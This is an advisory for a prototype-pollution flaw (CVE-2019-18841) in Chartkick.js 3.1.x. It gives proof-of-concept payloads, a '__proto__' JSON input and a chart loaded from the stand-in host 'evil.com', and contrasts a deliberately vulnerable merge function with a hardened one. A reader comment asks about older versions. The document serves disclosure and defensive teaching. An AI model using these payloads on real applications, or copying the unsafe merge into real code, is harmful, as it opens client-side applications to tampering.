Prototype Pollution in Chartkick.js 3.1.x
Under certain conditions, the 3.1.x series of Chartkick.js is vulnerable to prototype pollution. This is the same type of issue that was announced for jQuery and other popular libraries earlier this year. jQuery rated this a "minor vulnerability". It's certainly unintended behavior, but since Chartkick.js is a client-side only library, its impact is likely limited. This vulnerability has been assigned the CVE identifier CVE-2019-18841.
Versions Affected: 3.1.0 to 3.1.3
Fixed Versions: 3.2.0
Versions Unaffected: < 3.1.0
Impact
Passing untrusted input to `JSON.parse` and the result to Chartkick.js can pollute `Object.prototype`.

```javascript
// JSON.parse creates an own property literally named "__proto__";
// merging these options into defaults writes into Object.prototype.
var badOptions = JSON.parse('{"__proto__": {"test": true}}')
new Chartkick.LineChart("chart", data, badOptions) // `data` is the chart's series data
console.log("test" in {}) // true once the prototype has been polluted
```
A specially crafted response in data loaded via URL can cause pollution as well.

```javascript
// The fetched JSON is merged the same way, so a hostile server can supply the payload.
new Chartkick.LineChart("chart", "https://evil.com/data")
```
All users running an affected release should upgrade immediately.
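To show why the payload above works and how a merge routine avoids it, here is an added illustration (not Chartkick's own code) of a recursive option-merge of the kind charting libraries use to layer user options over defaults, in a vulnerable form and a hardened form, exercised with the advisory's `{"__proto__": {"test": true}}` input. The `mergeUnsafe`, `mergeSafe` and `pollutes` names are hypothetical.

```javascript
// Vulnerable variant: iterates every key of `source`, including "__proto__".
// On a plain target, target["__proto__"] resolves to Object.prototype, so the
// recursive call writes the nested keys into the shared prototype.
function mergeUnsafe(target, source) {
  for (const key in source) {
    const value = source[key];
    if (value !== null && typeof value === "object") {
      if (target[key] === null || typeof target[key] !== "object") target[key] = {};
      mergeUnsafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened variant: only own keys are copied, the prototype-reaching keys are
// skipped, and nested targets are only reused when they are own plain objects.
const UNSAFE_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function isPlainObject(v) {
  return v !== null && typeof v === "object" && !Array.isArray(v);
}

function mergeSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (UNSAFE_KEYS.has(key)) continue; // never walk into the prototype chain
    const value = source[key];
    if (isPlainObject(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      mergeSafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed input: the advisory's proof-of-concept payload.
const PAYLOAD = '{"__proto__": {"test": true}}';

// Merges the parsed payload into fresh defaults with the given merge function,
// reports whether Object.prototype was polluted, then restores the prototype so
// both variants can be compared in one process.
function pollutes(mergeFn) {
  const badOptions = JSON.parse(PAYLOAD);
  mergeFn({ legend: true }, badOptions);
  const polluted = "test" in {};
  delete Object.prototype.test;
  return polluted;
}

console.log("unsafe merge pollutes Object.prototype:", pollutes(mergeUnsafe)); // true
console.log("safe merge pollutes Object.prototype:", pollutes(mergeSafe));     // false
```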
Hi, are you sure this vulnerability does not exist before? In 2.1.0, I saw some lines that look like those fixed.
Cheers,